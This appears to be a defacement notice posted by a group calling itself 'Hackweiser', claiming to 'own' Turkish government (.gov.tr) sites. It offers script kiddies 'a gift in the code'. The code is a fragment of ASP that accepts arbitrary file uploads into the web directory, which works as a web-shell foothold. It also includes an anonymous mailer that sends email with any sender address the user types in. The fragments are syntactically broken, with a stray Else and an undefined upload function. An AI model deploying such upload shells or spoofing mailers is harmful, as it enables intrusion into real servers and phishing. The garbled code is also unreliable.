w00t w00t

Hackweiser

owns .gov.tr

a gift in the code for the skiddies !

why because HW lubs j00 !!

ill give yea this clue ;)

created by: CupiD^ ( cupid-boy@linuxmail.org )

<%set ObjPasta = nothing set Objeto = nothing%> <% If Request.ServerVariables("REQUEST_METHOD") = "POST" Then Set Fields = GetUpload() FilePath = Server.MapPath(".") & "\" & Fields("File1").FileName Fields("File1").Value.SaveAs FilePath End If %> <% Else Dim anonFrom,anonTo,anonSubj,anonBody anonFrom = request.form("From") anonTo = request.form("To") anonSubj = request.form("Subject") anonBody = request.form("Body") Set objMail = CreateObject("CDONTS.NewMail") objMail.From=anonFrom objMail.To=anonTo objMail.Subject=anonSubj objMail.Body=anonBody intReturn=objMail.Send() %> <% End if %>